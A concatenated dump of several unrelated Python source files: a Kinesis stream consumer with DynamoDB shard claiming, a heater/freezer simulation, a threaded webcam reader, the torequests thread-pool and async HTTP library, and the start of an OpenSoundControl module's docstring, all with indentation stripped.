# Continuously try to claim until broken out of
while True:
# First check if we can claim outside the semaphore in parallel on all shards
if self.can_claim_shard(shard_id):
# If we can claim it, try again with a semaphore ensuring we fully check the entire
# table of workers/shards before we take the final decision
with self.semaphore:
if self.can_claim_shard(shard_id):
if self.claim_shard(shard_id):
break
# Wait a bit until we check if it's available to claim again
time.sleep(random.randrange(2, 15))
except NoItemsReturned:
# no record for this shard found, nobody ever claimed the shard yet, so claim it
self.control_table.put_item(Item={
'shard_id': shard_id,
'checkpoint': 0,
'worker_id': self.worker_id,
'heartbeat': 0,
})
# get initial iterator
control_record = self.control_table.get_item(Key={'shard_id': shard_id})['Item']
if control_record['checkpoint']:
# if we have a checkpoint, start from the checkpoint
iterator = self.conn.get_shard_iterator(
StreamName=self.stream_name,
ShardId=shard_id,
ShardIteratorType="AT_SEQUENCE_NUMBER",
StartingSequenceNumber=str(control_record['checkpoint'])
)['ShardIterator']
else:
# we have no checkpoint stored, start from the latest item in Kinesis
iterator = self.conn.get_shard_iterator(
StreamName=self.stream_name,
ShardId=shard_id,
ShardIteratorType="LATEST",
)['ShardIterator']
cloudwatch = boto3.client(**self.connection_parameters('cloudwatch'))
current_minute = lambda: datetime.datetime.now().minute
minute = None
latest_item = None
while True:
control_record = self.control_table.get_item(Key={'shard_id': shard_id})['Item'] # always retrieve this at the top of the loop
current_checkpoint = control_record['checkpoint']
current_heartbeat = control_record['heartbeat']
# if the shard was claimed by another worker, break out of the loop
if not control_record['worker_id'] == self.worker_id:
shard_election_logger.info("Lost shard %s, going back to standby" % shard_id)
break
# update the heartbeat and the checkpoint
control_record['heartbeat'] += 1
if len(self.uncompleted_ids[shard_id]):
# Get the "youngest" uncompleted sequence number
control_record['checkpoint'] = min(self.uncompleted_ids[shard_id])
elif latest_item:
# or the latest item we yielded
control_record['checkpoint'] = latest_item
self.control_table.put_item(Item=control_record,
ConditionExpression=Attr('shard_id').eq(shard_id) & Attr('checkpoint').eq(current_checkpoint) & Attr('worker_id').eq(self.worker_id) & Attr('heartbeat').eq(current_heartbeat)
# Will fail if someone else modified it - ConditionalCheckFailedException
)
if len(self.uncompleted_ids[shard_id]) < self.MAX_UNCOMPLETED_ITEMS:
# get records from Kinesis, using the previously created iterator
result = self.conn.get_records(ShardIterator=iterator, Limit=self.GET_RECORDS_LIMIT)
# insert the records into the queue, and use the provided iterator for the next loop
for record in result['Records']:
self.uncompleted_ids[shard_id].add(record['SequenceNumber'])
latest_item = record['SequenceNumber']
self.insertion_queue.put(record)
iterator = result['NextShardIterator']
else:
logger.debug("Pausing, too many uncompleted items (%s/%s)" % (len(self.uncompleted_ids[shard_id]), self.MAX_UNCOMPLETED_ITEMS))
# we have too many uncompleted items, so back off for a while
# however, the iterator needs to be updated, because it expires after a while
# use the latest record we added to the queue as the starting point
next_iterator_number = latest_item if latest_item else str(control_record['checkpoint'])
iterator = self.conn.get_shard_iterator(
StreamName=self.stream_name,
ShardId=shard_id,
ShardIteratorType="AT_SEQUENCE_NUMBER",
StartingSequenceNumber=next_iterator_number
)['ShardIterator']
# get just one item to update the MillisBehindLatest below
result = self.conn.get_records(ShardIterator=iterator, Limit=1)
# Push metrics to CloudWatch
delay = result['MillisBehindLatest']
if minute != current_minute(): # push once per minute to CloudWatch.
minute = current_minute()
cloudwatch.put_metric_data(Namespace='Motorway/Kinesis',
MetricData=[{'MetricName': 'MillisecondsBehind',
'Dimensions': [{
'Name': 'Stream',
'Value': self.stream_name
}, {
'Name': 'Shard',
'Value': shard_id
}],
'Value': delay,
'Unit': 'Milliseconds'
}])
# recommended pause between fetches from AWS
time.sleep(1)
except self.dynamodb_client.exceptions.ConditionalCheckFailedException as e:
logger.warning(e)
pass # we're no longer worker for this shard
            except (self.dynamodb_client.exceptions.ProvisionedThroughputExceededException,
                    self.conn.exceptions.LimitExceededException,
                    self.conn.exceptions.ProvisionedThroughputExceededException) as e:
logger.warning(e)
time.sleep(random.randrange(5, self.heartbeat_timeout//2)) # back off for a while
def connection_parameters(self, service_name):
return {
'region_name': 'eu-west-1',
'service_name': service_name,
# Add this or use ENV VARS
# 'aws_access_key_id': '',
# 'aws_secret_access_key': ''
}
def next(self):
msg = self.insertion_queue.get()
try:
yield Message(msg['SequenceNumber'], json.loads(msg['Data']), grouping_value=msg['PartitionKey'])
except ValueError as e:
logger.exception(e)
def success(self, _id):
for uncompleted_ids in self.uncompleted_ids.values():
if _id in uncompleted_ids:
uncompleted_ids.remove(_id)
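# Illustrative subclass sketch (the stream name is an example, not part of this module):
#   class MyKinesisRamp(KinesisRamp):
#       stream_name = 'my-kinesis-stream'
# Instantiating it starts one thread per Kinesis shard; next() yields Messages keyed by the
# record's SequenceNumber, which success() later removes from the uncompleted set.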
|
ExperimentControl.py
|
#!/usr/bin/python3
import sys
from threading import Thread
# @license: public domain
# See ExperimentControl.tla for description
class ExperimentControl:
# Init ==
def __init__(self, init_temp=20, low_temp=0, high_temp=50, delta=5):
self.pc = "HEAT"
self.power = "ON"
self.freeze = "NO"
self.temperature = int(init_temp)
self.Low = int(low_temp)
self.High = int(high_temp)
self.delta = int(delta)
self.phase = 1
assert(self.Low < self.High)
assert(self.temperature < self.High)
# run Heat and Freeze simultaneously
thread1 = Thread(target=self.Heat, args=())
thread2 = Thread(target=self.Freeze, args=())
thread2.start()
thread1.start()
thread2.join()
thread1.join()
def Heat(self):
while True:
if self.pc == "DONE":
break
if self.pc == "HEAT":
if self.temperature >= self.High:
self.freeze = "YES"
self.power = "OFF"
self.pc = "FREEZE"
self.phase += 1
else:
self.temperature += self.delta
print(self.pc, self.temperature)
def Freeze(self):
#assert(self.pc == "FREEZE")
while True:
if self.pc == "DONE":
break
if self.pc == "FREEZE":
if self.temperature <= self.Low:
self.freeze = "YES"
if self.phase != 4:
self.power = "ON"
self.pc = "HEAT"
self.phase +=1
else:
self.pc = "DONE"
else:
self.temperature -= self.delta
print(self.pc, self.temperature)
# Run with default parameters, without asking
# for initial values
if len(sys.argv) == 2 and sys.argv[1] == '-0':
ec = ExperimentControl()
else:
init_temp = input("Enter the initial temperature: ")
low_temp = input("Enter the lower temperature: ")
higher_temp = input("Enter the higher temperature: ")
delta = input("Enter the amount temperature to increase or decrease the temperature: ")
ec = ExperimentControl(init_temp, low_temp, higher_temp, delta)
|
webcamvideostream.py
|
import cv2
from threading import Thread
import time
import numpy as np
class WebcamVideoStream:
def __init__(self, src = 0):
print("init")
self.stream = cv2.VideoCapture(src)
(self.grabbed, self.frame) = self.stream.read()
self.stopped = False
time.sleep(2.0)
def start(self):
print("start thread")
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
print("read")
while True:
if self.stopped:
return
(self.grabbed, self.frame) = self.stream.read()
def read(self):
return self.frame
def stop(self):
self.stopped = True
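# Illustrative usage (assumes a camera is available at index 0):
#   vs = WebcamVideoStream(src=0).start()
#   frame = vs.read()   # most recent frame grabbed by the background thread
#   vs.stop()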
|
main.py
|
#! coding:utf-8
# python2 requires: pip install futures
import atexit
from concurrent.futures import (ProcessPoolExecutor, ThreadPoolExecutor,
as_completed)
from concurrent.futures._base import (CANCELLED, CANCELLED_AND_NOTIFIED,
FINISHED, PENDING, RUNNING,
CancelledError, Error, Executor, Future,
TimeoutError)
from concurrent.futures.thread import _threads_queues, _WorkItem
from functools import wraps
from logging import getLogger
from threading import Thread, Timer
from time import sleep
from time import time as time_time
from weakref import WeakSet
from requests import PreparedRequest, RequestException, Session
from requests.adapters import HTTPAdapter
from urllib3 import disable_warnings
from .configs import Config
from .exceptions import FailureException, ValidationError
from .frequency_controller.sync_tools import Frequency
from .versions import PY2, PY3
try:
from queue import Empty, Queue
except ImportError:
from Queue import Empty, Queue
if PY3:
from concurrent.futures.process import BrokenProcessPool
__all__ = [
"Pool", "ProcessPool", "NewFuture", "Async", "threads",
"get_results_generator", "run_after_async", "tPool", "get", "post",
"options", "delete", "put", "head", "patch", "request", "disable_warnings",
"Workshop"
]
logger = getLogger("torequests")
def _abandon_all_tasks():
"""Only used for abandon_all_tasks and exit the main thread,
to prevent the main thread waiting for unclosed thread while exiting."""
_threads_queues.clear()
def ensure_waiting_for_threads():
if Config.wait_futures_before_exiting:
_abandon_all_tasks()
atexit.register(ensure_waiting_for_threads)
class NewExecutorPoolMixin(Executor):
"""Add async_func decorator for wrapping a function to return the NewFuture."""
def async_func(self, function):
"""Decorator for let a normal function return the NewFuture"""
@wraps(function)
def wrapped(*args, **kwargs):
return self.submit(function, *args, **kwargs)
return wrapped
def close(self, wait=True):
"""Same as self.shutdown"""
return self.shutdown(wait=wait)
def _get_cpu_count(self):
"""Get the cpu count."""
try:
from multiprocessing import cpu_count
return cpu_count()
except Exception as e:
logger.error("_get_cpu_count failed for %s" % e)
@property
def x(self):
"""Return self.wait_futures_done"""
return self.wait_futures_done(list(self._all_futures))
def wait_futures_done(self, tasks=None):
# ignore the order of tasks
tasks = tasks or self._all_futures
fs = []
try:
for f in as_completed(tasks, timeout=self._timeout):
fs.append(f.x)
except TimeoutError:
pass
return fs
class Pool(ThreadPoolExecutor, NewExecutorPoolMixin):
"""Let ThreadPoolExecutor use NewFuture instead of origin concurrent.futures.Future.
WARNING: NewFutures in Pool will not block main thread without NewFuture.x.
Basic Usage::
from torequests.main import Pool
import time
pool = Pool()
def use_submit(i):
time.sleep(i)
result = 'use_submit: %s' % i
print(result)
return result
@pool.async_func
def use_decorator(i):
time.sleep(i)
result = 'use_decorator: %s' % i
print(result)
return result
tasks = [pool.submit(use_submit, i) for i in (2, 1, 0)
] + [use_decorator(i) for i in (2, 1, 0)]
        # pool.x can be ignored
pool.x
results = [i.x for i in tasks]
print(results)
# use_submit: 0
# use_decorator: 0
# use_submit: 1
# use_decorator: 1
# use_submit: 2
# use_decorator: 2
# ['use_submit: 2', 'use_submit: 1', 'use_submit: 0', 'use_decorator: 2', 'use_decorator: 1', 'use_decorator: 0']
"""
def __init__(self,
n=None,
timeout=None,
default_callback=None,
catch_exception=True,
*args,
**kwargs):
n = n or kwargs.pop("max_workers", None)
if PY2 and n is None:
            # python2 requires max_workers to be an explicit int (it cannot be None)
n = (self._get_cpu_count() or 1) * 5
super(Pool, self).__init__(n, *args, **kwargs)
#: set the default timeout
self._timeout = timeout
#: set the default_callback if not set single task's callback
self.default_callback = default_callback
#: WeakSet of _all_futures for self.x
self._all_futures = WeakSet()
#: catch_exception=True will not raise exceptions, return object FailureException(exception)
self.catch_exception = catch_exception
@property
def all_tasks(self):
"""Keep the same api for dummy, return self._all_futures actually"""
return self._all_futures
def submit(self, func, *args, **kwargs):
"""Submit a function to the pool, `self.submit(function,arg1,arg2,arg3=3)`"""
with self._shutdown_lock:
if self._shutdown:
raise RuntimeError("cannot schedule new futures after shutdown")
callback = kwargs.pop("callback", self.default_callback)
future = NewFuture(
self._timeout,
args,
kwargs,
callback=callback,
catch_exception=self.catch_exception,
)
w = _WorkItem(future, func, args, kwargs)
self._work_queue.put(w)
self._adjust_thread_count()
self._all_futures.add(future)
return future
class ProcessPool(ProcessPoolExecutor, NewExecutorPoolMixin):
"""Simple ProcessPool covered ProcessPoolExecutor.
::
from torequests.main import ProcessPool
import time
pool = ProcessPool()
def use_submit(i):
time.sleep(i)
result = 'use_submit: %s' % i
print(result)
return result
def main():
tasks = [pool.submit(use_submit, i) for i in (2, 1, 0)]
# pool.x can be ignored
pool.x
results = [i.x for i in tasks]
print(results)
if __name__ == '__main__':
main()
# ['use_submit: 2', 'use_submit: 1', 'use_submit: 0']
# use_submit: 0
# use_submit: 1
# use_submit: 2
"""
def __init__(self,
n=None,
timeout=None,
default_callback=None,
catch_exception=True,
*args,
**kwargs):
n = n or kwargs.pop("max_workers", None)
if PY2 and n is None:
# Python 2 requires an explicit max_workers value
n = self._get_cpu_count() or 1
super(ProcessPool, self).__init__(n, *args, **kwargs)
self._timeout = timeout
self.default_callback = default_callback
self._all_futures = WeakSet()
self.catch_exception = catch_exception
def submit(self, func, *args, **kwargs):
"""Submit a function to the pool, `self.submit(function,arg1,arg2,arg3=3)`"""
with self._shutdown_lock:
if PY3 and self._broken:
raise BrokenProcessPool(
"A child process terminated "
"abruptly, the process pool is not usable anymore")
if self._shutdown_thread:
raise RuntimeError("cannot schedule new futures after shutdown")
callback = kwargs.pop("callback", self.default_callback)
future = NewFuture(
self._timeout,
args,
kwargs,
callback=callback,
catch_exception=self.catch_exception,
)
w = _WorkItem(future, func, args, kwargs)
self._pending_work_items[self._queue_count] = w
self._work_ids.put(self._queue_count)
self._queue_count += 1
self._result_queue.put(None)
self._start_queue_management_thread()
if PY2:
self._adjust_process_count()
self._all_futures.add(future)
return future
def async_func(self, *args):
"""Decorator mode not support for ProcessPool for _pickle.PicklingError."""
raise NotImplementedError
class NewFuture(Future):
"""Add `.x` attribute and timeout args for original Future class
WARNING: the Future's thread will not stop running until the function finishes or the process is killed.
:attr cx: block until the task finishes and return the callback_result.
:attr x: block until the task finishes and return the task's own result.
:attr task_start_time: timestamp when the task starts.
:attr task_end_time: timestamp when the task ends.
:attr task_cost_time: seconds the task costs.
:param catch_exception: `True` will catch all exceptions and return as :class:`FailureException <FailureException>`
"""
if PY3:
from ._py3_patch import _new_future_await
__await__ = _new_future_await
def __init__(self,
timeout=None,
args=None,
kwargs=None,
callback=None,
catch_exception=True):
super(NewFuture, self).__init__()
self._timeout = timeout
self._args = args or ()
self._kwargs = kwargs or {}
self._callback_result = None
self.catch_exception = catch_exception
self.task_start_time = time_time()
self.task_end_time = 0
self.task_cost_time = 0
self._user_callbacks = set()
if callback:
if not isinstance(callback, (list, tuple)):
callback = [callback]
for fn in callback:
self.add_done_callback(fn)
self._user_callbacks.add(fn)
def __getattr__(self, name):
return getattr(self.x, name)
def _invoke_callbacks(self):
"""Record the task_end_time & task_cost_time, set result for self._callback_result."""
self.task_end_time = time_time()
self.task_cost_time = self.task_end_time - self.task_start_time
with self._condition:
for callback in self._done_callbacks:
try:
result = callback(self)
if callback in self._user_callbacks:
self._callback_result = result
except Exception as e:
logger.error("exception calling callback for %s" % e)
self._condition.notify_all()
@property
def _callbacks(self):
"""Keep same api for NewTask."""
return self._done_callbacks
@property
def cx(self):
"""Block the main thead until future finish, return the future.callback_result."""
return self.callback_result
@property
def callback_result(self):
"""Block the main thead until future finish, return the future.callback_result."""
if self._state in [PENDING, RUNNING]:
self.x
if self._user_callbacks:
return self._callback_result
else:
return self.x
@property
def x(self):
"""Block the main thead until future finish, return the future.result()."""
with self._condition:
result = None
if not self.done():
self._condition.wait(self._timeout)
if not self.done():
# timeout
self.set_exception(TimeoutError())
if self._state in [CANCELLED, CANCELLED_AND_NOTIFIED]:
# cancelled
result = CancelledError()
elif self._state == FINISHED:
# finished
if self._exception:
result = self._exception
else:
result = self._result
if isinstance(result, Exception):
if self.catch_exception:
result = FailureException(result)
return result
else:
raise result
return result
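# A minimal sketch (kept in comments so nothing runs at import time) of the
# difference between NewFuture.x and NewFuture.cx described above: .x blocks
# for the submitted function's own return value, while .cx blocks for the
# value returned by the user callback, when one was given.
#
#     pool = Pool()
#     future = pool.submit(sum, [1, 2, 3], callback=lambda f: f.result() * 10)
#     print(future.x)               # 6, the function's result
#     print(future.cx)              # 60, the callback's result
#     print(future.task_cost_time)  # seconds the task took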
def Async(f, n=None, timeout=None):
"""Concise usage for pool.submit.
Basic Usage Asnyc & threads ::
from torequests.main import Async, threads
import time
def use_submit(i):
time.sleep(i)
result = 'use_submit: %s' % i
print(result)
return result
@threads()
def use_decorator(i):
time.sleep(i)
result = 'use_decorator: %s' % i
print(result)
return result
new_use_submit = Async(use_submit)
tasks = [new_use_submit(i) for i in (2, 1, 0)
] + [use_decorator(i) for i in (2, 1, 0)]
print([type(i) for i in tasks])
results = [i.x for i in tasks]
print(results)
# use_submit: 0
# use_decorator: 0
# [<class 'torequests.main.NewFuture'>, <class 'torequests.main.NewFuture'>, <class 'torequests.main.NewFuture'>, <class 'torequests.main.NewFuture'>, <class 'torequests.main.NewFuture'>, <class 'torequests.main.NewFuture'>]
# use_submit: 1
# use_decorator: 1
# use_submit: 2
# use_decorator: 2
# ['use_submit: 2', 'use_submit: 1', 'use_submit: 0', 'use_decorator: 2', 'use_decorator: 1', 'use_decorator: 0']
"""
return threads(n=n, timeout=timeout)(f)
def threads(n=None, timeout=None):
"""Decorator usage like Async."""
return Pool(n, timeout).async_func
def get_results_generator(future_list, timeout=None, sort_by_completed=False):
"""Return as a generator of tasks order by completed sequence."""
try:
# python2 not support yield from
if sort_by_completed:
for future in as_completed(future_list, timeout=timeout):
yield future.x
else:
for future in future_list:
yield future.x
except TimeoutError:
return
def run_after_async(seconds, func, *args, **kwargs):
"""Run the function after seconds asynchronously."""
t = Timer(seconds, func, args, kwargs)
t.daemon = True
t.start()
return t
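# A small usage sketch (comments only, so it does not execute at import time):
# submit a few tasks, consume their results lazily in completion order with
# get_results_generator, then schedule a follow-up function with
# run_after_async. The helper `delayed_report` is hypothetical; everything else
# is defined above.
#
#     pool = Pool()
#     futures = [pool.submit(time_time) for _ in range(3)]
#     for result in get_results_generator(futures, sort_by_completed=True):
#         print(result)                       # timestamps, fastest task first
#
#     def delayed_report():
#         print("ran roughly 2 seconds later")
#     run_after_async(2, delayed_report)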
class FailedRequest(PreparedRequest):
allow_keys = {
"method",
"url",
"headers",
"files",
"data",
"params",
"auth",
"cookies",
"hooks",
"json",
}
def __init__(self, **kwargs):
# self.kwargs for retry tPool.request
self.kwargs = kwargs
filted_kwargs = {
key: value
for key, value in kwargs.items()
if key in self.allow_keys
}
super(FailedRequest, self).__init__()
self.prepare(**filted_kwargs)
class tPool(object):
"""Async wrapper for requests.
:param n: thread pool size for concurrent limit.
:param interval: time.sleep(interval) after each task finished.
:param timeout: timeout for each task.result(timeout); note it does not shut down the underlying function.
:param session: optionally pass in an existing requests.Session instance to reuse.
:param catch_exception: `True` will catch all exceptions and return as :class:`FailureException <FailureException>`
:param default_callback: default_callback for tasks which not set callback param.
Usage::
from torequests.main import tPool
from torequests.logs import print_info
trequests = tPool(2, 1)
test_url = 'http://p.3.cn'
ss = [
trequests.get(
test_url,
retry=2,
callback=lambda x: (len(x.content), print_info(len(x.content))))
for i in range(3)
]
# or [i.x for i in ss]
trequests.x
ss = [i.cx for i in ss]
print_info(ss)
# [2020-02-11 11:36:33] temp_code.py(10): 612
# [2020-02-11 11:36:33] temp_code.py(10): 612
# [2020-02-11 11:36:34] temp_code.py(10): 612
# [2020-02-11 11:36:34] temp_code.py(16): [(612, None), (612, None), (612, None)]
"""
def __init__(
self,
n=None,
interval=0,
timeout=None,
session=None,
catch_exception=True,
default_callback=None,
retry_exceptions=(RequestException, Error),
):
self.pool = Pool(n, timeout)
self.session = session if session else Session()
self.n = n or 10
# adapt the concurrent limit.
custom_adapter = HTTPAdapter(pool_connections=self.n,
pool_maxsize=self.n)
self.session.mount("http://", custom_adapter)
self.session.mount("https://", custom_adapter)
self.interval = interval
self.catch_exception = catch_exception
self.default_callback = default_callback
self.frequency = Frequency(self.n, self.interval)
self.retry_exceptions = retry_exceptions
@property
def all_tasks(self):
"""Return self.pool._all_futures"""
return self.pool._all_futures
@property
def x(self):
"""Return self.pool.x"""
return self.pool.x
def close(self, wait=False):
"""Close session, shutdown pool."""
self.session.close()
self.pool.shutdown(wait=wait)
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
def __del__(self):
self.close()
def _request(self,
method,
url,
retry=0,
response_validator=None,
retry_interval=0,
**kwargs):
if not url:
raise ValueError("url should not be null, but given: %s" % url)
kwargs["url"] = url
kwargs["method"] = method
# non-official request args
referer_info = kwargs.pop("referer_info", None)
encoding = kwargs.pop("encoding", None)
error = Exception()
for _ in range(retry + 1):
with self.frequency:
try:
resp = self.session.request(**kwargs)
if encoding:
resp.encoding = encoding
logger.debug("%s done, %s" % (url, kwargs))
resp.referer_info = referer_info
if response_validator and not response_validator(resp):
raise ValidationError(response_validator.__name__)
return resp
except self.retry_exceptions as e:
error = e
logger.debug(
"Retry %s for the %s time, Exception: %r . kwargs= %s" %
(url, _ + 1, e, kwargs))
if retry_interval:
sleep(retry_interval)
continue
# for unofficial request args
kwargs["retry"] = retry
if referer_info:
kwargs["referer_info"] = referer_info
if encoding:
kwargs["encoding"] = encoding
logger.debug("Retry %s times failed again: %s." % (retry, error))
failure = FailureException(error)
failure.request = FailedRequest(**kwargs)
if self.catch_exception:
return failure
else:
raise failure
def request(self,
method,
url,
callback=None,
retry=0,
response_validator=None,
**kwargs):
"""Similar to `requests.request`, but return as NewFuture."""
return self.pool.submit(self._request,
method=method,
url=url,
retry=retry,
response_validator=response_validator,
callback=callback or self.default_callback,
**kwargs)
def get(self,
url,
params=None,
callback=None,
retry=0,
response_validator=None,
**kwargs):
"""Similar to `requests.get`, but return as NewFuture."""
kwargs.setdefault("allow_redirects", True)
return self.request("get",
url=url,
params=params,
callback=callback,
retry=retry,
response_validator=response_validator,
**kwargs)
def post(self,
url,
data=None,
json=None,
callback=None,
retry=0,
response_validator=None,
**kwargs):
"""Similar to `requests.post`, but return as NewFuture."""
return self.request("post",
url=url,
data=data,
json=json,
callback=callback,
retry=retry,
response_validator=response_validator,
**kwargs)
def delete(self,
url,
callback=None,
retry=0,
response_validator=None,
**kwargs):
"""Similar to `requests.delete`, but return as NewFuture."""
return self.request("delete",
url=url,
callback=callback,
retry=retry,
response_validator=response_validator,
**kwargs)
def put(self,
url,
data=None,
callback=None,
retry=0,
response_validator=None,
**kwargs):
"""Similar to `requests.put`, but return as NewFuture."""
return self.request("put",
url=url,
data=data,
callback=callback,
retry=retry,
response_validator=response_validator,
**kwargs)
def head(self,
url,
callback=None,
retry=0,
response_validator=None,
allow_redirects=False,
**kwargs):
"""Similar to `requests.head`, but return as NewFuture."""
kwargs['allow_redirects'] = allow_redirects
return self.request("head",
url=url,
callback=callback,
retry=retry,
response_validator=response_validator,
**kwargs)
def options(self,
url,
callback=None,
retry=0,
response_validator=None,
**kwargs):
"""Similar to `requests.options`, but return as NewFuture."""
kwargs.setdefault("allow_redirects", True)
return self.request("options",
url=url,
callback=callback,
retry=retry,
response_validator=response_validator,
**kwargs)
def patch(self,
url,
callback=None,
retry=0,
response_validator=None,
**kwargs):
"""Similar to `requests.patch`, but return as NewFuture."""
return self.request("patch",
url=url,
callback=callback,
retry=retry,
response_validator=response_validator,
**kwargs)
def get(url,
params=None,
callback=None,
retry=0,
response_validator=None,
**kwargs):
return tPool().get(url,
params=params,
callback=callback,
retry=retry,
response_validator=response_validator,
**kwargs)
def post(url,
data=None,
json=None,
callback=None,
retry=0,
response_validator=None,
**kwargs):
return tPool().post(url,
data=data,
json=json,
callback=callback,
retry=retry,
response_validator=response_validator,
**kwargs)
def delete(url, callback=None, retry=0, response_validator=None, **kwargs):
return tPool().delete(url,
callback=callback,
retry=retry,
response_validator=response_validator,
**kwargs)
def put(url,
data=None,
callback=None,
retry=0,
response_validator=None,
**kwargs):
return tPool().put(url,
data=data,
callback=callback,
retry=retry,
response_validator=response_validator,
**kwargs)
def head(url, callback=None, retry=0, response_validator=None, **kwargs):
return tPool().head(url,
callback=callback,
retry=retry,
response_validator=response_validator,
**kwargs)
def options(url, callback=None, retry=0, response_validator=None, **kwargs):
return tPool().options(url,
callback=callback,
retry=retry,
response_validator=response_validator,
**kwargs)
def patch(url, callback=None, retry=0, response_validator=None, **kwargs):
return tPool().patch(url,
callback=callback,
retry=retry,
response_validator=response_validator,
**kwargs)
def request(method,
url,
callback=None,
retry=0,
response_validator=None,
**kwargs):
return tPool().request(method,
url,
callback=callback,
retry=retry,
response_validator=response_validator,
**kwargs)
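# Minimal sketch of the one-shot module-level helpers above (comments only).
# Each call builds a temporary tPool and returns a NewFuture; .x blocks for a
# requests.Response, or a FailureException when catch_exception is on. The URL
# is a placeholder, not a recommendation.
#
#     future = get("http://httpbin.org/get", retry=1)
#     response = future.x
#     if response:
#         print(response.status_code)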
class Workshop:
"""Simple solution for producer-consumer problem.
WARNING: callback should have its own timeout to avoid blocking too long.
Demo::
import time
from torequests.main import Workshop
def callback(todo, worker_arg):
time.sleep(todo)
if worker_arg == 'worker1':
return None
return [todo, worker_arg]
fc = Workshop(range(1, 5), ['worker1', 'worker2', 'worker3'], callback)
for i in fc.get_result_as_completed():
print(i)
# [2, 'worker2']
# [3, 'worker3']
# [1, 'worker2']
# [4, 'worker3']
for i in fc.get_result_as_sequence():
print(i)
# [1, 'worker3']
# [2, 'worker3']
# [3, 'worker3']
# [4, 'worker2']
"""
def __init__(self,
todo_args,
worker_args,
callback,
timeout=None,
wait_empty_secs=1,
handle_exceptions=(),
max_failure=None,
fail_returned=None):
"""
:param todo_args: args to be send to callback
:type todo_args: List[Any]
:param worker_args: args for launching worker threads; pass duplicates such as [worker1, worker1, worker1] to run several concurrent workers
:type worker_args: List[Any]
:param callback: callback to consume the todo_arg from queue, handle args like callback(todo_arg, worker_arg)
:type callback: Callable
:param timeout: timeout for worker running, defaults to None
:type timeout: [float, int], optional
:param wait_empty_secs: seconds to sleep while queue is Empty, defaults to 1
:type wait_empty_secs: float, optional
:param handle_exceptions: exceptions raised from callback that should be ignored, defaults to ()
:type handle_exceptions: Tuple[Exception], optional
:param max_failure: stop a worker after it fails too many times, defaults to None
:type max_failure: int, optional
:param fail_returned: value which, when returned from callback, is treated as a failure, defaults to None
:type fail_returned: Any, optional
"""
self.q = Queue()
self.futures = self.init_futures(todo_args)
self.worker_args = worker_args
self.callback = callback
self.timeout = timeout or float('inf')
self.wait_empty_secs = wait_empty_secs
self.result = None
self.handle_exceptions = handle_exceptions
self.max_failure = float('inf') if max_failure is None else max_failure
self.fail_returned = fail_returned
self._done = False
self._done_signal = object()
def init_futures(self, todo_args):
futures = []
for arg in todo_args:
f = Future()
f.arg = arg
futures.append(f)
self.q.put(f)
return futures
def run(self, as_completed=False):
"""run until all tasks finished"""
if as_completed:
return list(self.get_result_as_completed())
return list(self.get_result_as_sequence())
def get_result_as_sequence(self):
"""return a generator of results with same sequence as self.todo_args"""
self.start_workers()
for f in self.futures:
yield f.result()
def get_result_as_completed(self):
"""return a generator of results as completed sequence"""
self.start_workers()
for f in as_completed(self.futures):
yield f.result()
@property
def done(self):
self._done = self._done or all((f.done() for f in self.futures))
return self._done
def worker(self, worker_arg):
fails = 0
start_time = time_time()
while time_time() - start_time < self.timeout and fails <= self.max_failure:
try:
f = self.q.get(timeout=self.wait_empty_secs)
if f is self._done_signal:
break
except Empty:  # queue.Empty raised by q.get(timeout=...)
if self.done:
break
fails += 1
continue
try:
result = self.callback(f.arg, worker_arg)
except self.handle_exceptions as err:
logger.error(
'Raised {err!r}, worker_arg: {worker_arg}, todo_arg: {arg}'.
format_map(
dict(err=err,
worker_arg=repr(worker_arg)[:100],
arg=repr(f.arg)[:100])))
result = self.fail_returned
if result == self.fail_returned:
self.q.put(f)
fails += 1
sleep(self.wait_empty_secs)
continue
else:
f.set_result(result)
if fails > 0:
fails -= 1
# propagate the stop signal so the remaining workers can exit their loops
self.q.put_nowait(self._done_signal)
def start_workers(self):
self._done = False
for worker_arg in self.worker_args:
t = Thread(target=self.worker, args=(worker_arg,))
t.daemon = True
t.start()
OSC.py
#!/usr/bin/python
"""
This module contains an OpenSoundControl implementation (in Pure Python), based
(somewhat) on the good old 'SimpleOSC' implementation by Daniel Holth & Clinton
McChesney.
This implementation is intended to still be 'simple' to the user, but much more
complete (with OSCServer & OSCClient classes) and much more powerful (the
OSCMultiClient supports subscriptions & message-filtering, OSCMessage &
OSCBundle are now proper container-types)
===============================================================================
OpenSoundControl
===============================================================================
OpenSoundControl is a network-protocol for sending (small) packets of addressed
data over network sockets. This OSC-implementation supports the classical
UDP/IP protocol for sending and receiving packets but provides as well support
for TCP/IP streaming, whereas the message size is prepended as int32 (big
endian) before each message/packet.
OSC-packets come in two kinds:
- OSC-messages consist of an 'address'-string (not to be confused with a
(host:port) network-address!), followed by a string of 'typetags'
associated with the message's arguments (ie. 'payload'), and finally the
arguments themselves, encoded in an OSC-specific way. The OSCMessage class
makes it easy to create & manipulate OSC-messages of this kind in a
'pythonesque' way (that is, OSCMessage-objects behave a lot like lists)
- OSC-bundles are a special type of OSC-message containing only
OSC-messages as 'payload'. Recursively. (meaning; an OSC-bundle could
contain other OSC-bundles, containing OSC-bundles etc.)
OSC-bundles start with the special keyword '#bundle' and do not have an
OSC-address (but the OSC-messages a bundle contains will have OSC-addresses!).
Also, an OSC-bundle can have a timetag, essentially telling the receiving
server to 'hold' the bundle until the specified time. The OSCBundle class
allows easy creation & manipulation of OSC-bundles.
For further information see also http://opensoundcontrol.org/spec-1_0
-------------------------------------------------------------------------------
To send OSC-messages, you need an OSCClient, and to receive OSC-messages you
need an OSCServer.
The OSCClient uses an 'AF_INET / SOCK_DGRAM' type socket (see the 'socket'
module) to send binary representations of OSC-messages to a remote host:port
address.
The OSCServer listens on an 'AF_INET / SOCK_DGRAM' type socket bound to a local
port, and handles incoming requests. Either one-after-the-other (OSCServer) or
in a multi-threaded / multi-process fashion (ThreadingOSCServer/
ForkingOSCServer). If the Server has a callback-function (a.k.a. handler)
registered to 'deal with' (i.e. handle) the received message's OSC-address,
that function is called, passing it the (decoded) message.
The different OSCServers implemented here all support the (recursive) un-
bundling of OSC-bundles, and OSC-bundle timetags.
In fact, this implementation supports:
- OSC-messages with 'i' (int32), 'f' (float32), 'd' (double), 's' (string) and
'b' (blob / binary data) types
- OSC-bundles, including timetag-support
- OSC-address patterns including '*', '?', '{,}' and '[]' wildcards.
(please *do* read the OSC-spec! http://opensoundcontrol.org/spec-1_0 it
explains what these things mean.)
In addition, the OSCMultiClient supports:
- Sending a specific OSC-message to multiple remote servers
- Remote server subscription / unsubscription (through OSC-messages, of course)
- Message-address filtering.
-------------------------------------------------------------------------------
